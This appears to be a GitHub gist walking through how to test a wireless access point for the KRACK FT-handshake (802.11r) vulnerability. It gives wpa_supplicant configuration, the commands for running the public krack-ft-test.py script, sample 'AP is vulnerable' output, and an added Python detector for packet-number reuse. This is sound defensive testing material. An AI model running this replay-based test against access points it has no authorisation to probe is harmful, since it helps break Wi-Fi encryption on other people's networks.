@milo2012
Last active January 26, 2018 21:40
Testing KRACK - Testing Access Points: Detecting a vulnerable FT Handshake (802.11r)
#The steps below check whether a wireless access point supports the FT-PSK key management protocol and show how to use the scripts from https://github.com/vanhoefm/krackattacks-scripts to test whether the access point is vulnerable to KRACK.
#The page https://github.com/kristate/krackinfo#vendor-response-complete contains a list of vendor responses.
$ git clone https://github.com/vanhoefm/krackattacks-scripts
$ cd krackattacks-scripts/krackattack
$ sh disable-hwcrypto.sh
#Reboot the system so that hardware encryption offload is disabled.
#Create /tmp/wpa_supplicant.conf with content similar to the below.
'''
# cat /tmp/wpa_supplicant.conf
network={
ssid="XXXX"
scan_ssid=1
key_mgmt=WPA-PSK
#key_mgmt=FT-PSK
psk="XXXXXXXX"
}
'''
#Run the below command to connect to the Wi-Fi network using wpa_supplicant. This confirms that you can connect to the wireless network at all before testing for the vulnerability.
$ wpa_supplicant -D nl80211 -i wlan0 -c/tmp/wpa_supplicant.conf
#You should see something similar to the below. That means you are connected to the wireless network.
wlan0: Associated with XX:XX:XX:XX:XX:XX
wlan0: WPA: Key negotiation completed with XX:XX:XX:XX:XX:XX [PTK=CCMP GTK=CCMP]
#Modify /tmp/wpa_supplicant.conf and change the key_mgmt parameter from WPA-PSK to FT-PSK. This checks whether the access point supports the Fast BSS Transition (FT) handshake.
#Run the below command to connect to the Wifi using wpa_supplicant
$ wpa_supplicant -D nl80211 -i wlan0 -c/tmp/wpa_supplicant.conf
#If you are unable to connect to the network using FT-PSK key management, the access point does not appear to support FT and you might not be vulnerable to this FT-handshake variant. If you are able to connect to the wireless network, proceed with the steps below.
$ cd /pentest/krackattacks-scripts/krackattack
$ python krack-ft-test.py wpa_supplicant -D nl80211 -i wlan0 -c/tmp/wpa_supplicant.conf
#Run the below in another terminal. Replace X.X.X.X with the IP address of the wireless router.
$ arping -I wlan0 X.X.X.X
#Check the first terminal window (where krack-ft-test.py is running) for results. You should see something similar to the below if the access point is vulnerable.
Replaying Reassociation Request
AP transmitted data using IV=1 (seq=0)
Replaying Reassociation Request
AP transmitted data using IV=1 (seq=0)
IV reuse detected (IV=1, seq=0). AP is vulnerable!
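The "IV reuse detected" verdict above rests on one condition: a CCMP packet number (the "IV" in the tool's output) that goes backwards while the same pairwise key is still in use. The following is an added example, written for this page and not part of the gist or of the krackattacks-scripts project, that implements that check over a constructed trace of handshake and data events. It assumes a simplified event model in which a key is identified by the (ANonce, SNonce) pair of the handshake that installed it, so a fresh nonce pair legitimately resets the counter while a repeated pair (the situation created by a replayed Reassociation Request) must not; the nonce strings and the `ap` transmitter name are placeholders, not real values.

```python
# Added example, not code from the gist or from krackattacks-scripts.
# Passive CCMP packet-number (IV) reuse detector over a simplified event model.
#
# Assumptions: each transmitter's PN must increase strictly for as long as
# the same pairwise key is installed. A key is identified here by the
# (ANonce, SNonce) pair of the handshake that installed it. A fresh pair
# legitimately resets the PN; a repeated pair (replayed FT reassociation)
# keeps the old counter, so any PN <= the highest PN already seen is reuse.

from typing import Dict, Iterable, List, Tuple

NoncePair = Tuple[str, str]
# Event shapes: ("handshake", transmitter, (anonce, snonce)) or ("data", transmitter, pn)
Event = Tuple


def detect_iv_reuse(events: Iterable[Event]) -> List[dict]:
    """Return one finding per data frame whose PN does not exceed the highest
    PN already seen from the same transmitter under the same key."""
    current_key: Dict[str, NoncePair] = {}                 # transmitter -> key id
    highest_pn: Dict[Tuple[str, NoncePair], int] = {}      # (transmitter, key) -> max PN
    findings: List[dict] = []
    for index, event in enumerate(events):
        kind, tx = event[0], event[1]
        if kind == "handshake":
            # Same nonce pair => same key; its counter state persists.
            current_key[tx] = event[2]
            continue
        if kind != "data":
            raise ValueError(f"unknown event kind {kind!r}")
        pn = event[2]
        key = current_key.get(tx)
        if key is None:
            raise ValueError(f"data frame from {tx} before any handshake")
        slot = (tx, key)
        last = highest_pn.get(slot, 0)   # CCMP counters start above 0
        if pn <= last:
            findings.append({"index": index, "transmitter": tx,
                             "pn": pn, "previous_max": last})
        else:
            highest_pn[slot] = pn
    return findings


def ap_is_vulnerable(events: Iterable[Event]) -> bool:
    """True when at least one packet-number reuse was observed."""
    return bool(detect_iv_reuse(events))


# Constructed placeholder nonces (not real handshake values).
NONCES_A: NoncePair = ("anonce-placeholder-1", "snonce-placeholder-1")
NONCES_B: NoncePair = ("anonce-placeholder-2", "snonce-placeholder-2")

# Constructed trace of a vulnerable AP: after the replayed reassociation
# (same nonces), the AP restarts its counter at 1.
VULNERABLE_TRACE = [
    ("handshake", "ap", NONCES_A),
    ("data", "ap", 1), ("data", "ap", 2), ("data", "ap", 3),
    ("handshake", "ap", NONCES_A),   # replay: same key reinstalled
    ("data", "ap", 1),               # PN reset -> reuse
    ("data", "ap", 2),               # still below the old maximum -> reuse
]

# Constructed trace of a patched AP: the replay does not reset the counter,
# and only a genuine rekey with fresh nonces starts a new counter.
PATCHED_TRACE = [
    ("handshake", "ap", NONCES_A),
    ("data", "ap", 1), ("data", "ap", 2), ("data", "ap", 3),
    ("handshake", "ap", NONCES_A),   # replay ignored: counter continues
    ("data", "ap", 4),
    ("handshake", "ap", NONCES_B),   # fresh nonces: new key
    ("data", "ap", 1),               # legitimate reset
]

if __name__ == "__main__":
    for name, trace in (("vulnerable", VULNERABLE_TRACE), ("patched", PATCHED_TRACE)):
        found = detect_iv_reuse(trace)
        verdict = "IV reuse detected" if found else "no reuse"
        print(f"{name}: {verdict} {found}")
```

Extracting the real transmitter address and packet number from captured 802.11 frames (which the krack-ft-test.py tool does for you) is deliberately left out; the point of the example is the verdict logic, namely that a counter reset is only benign when it coincides with a handshake that carried fresh nonces.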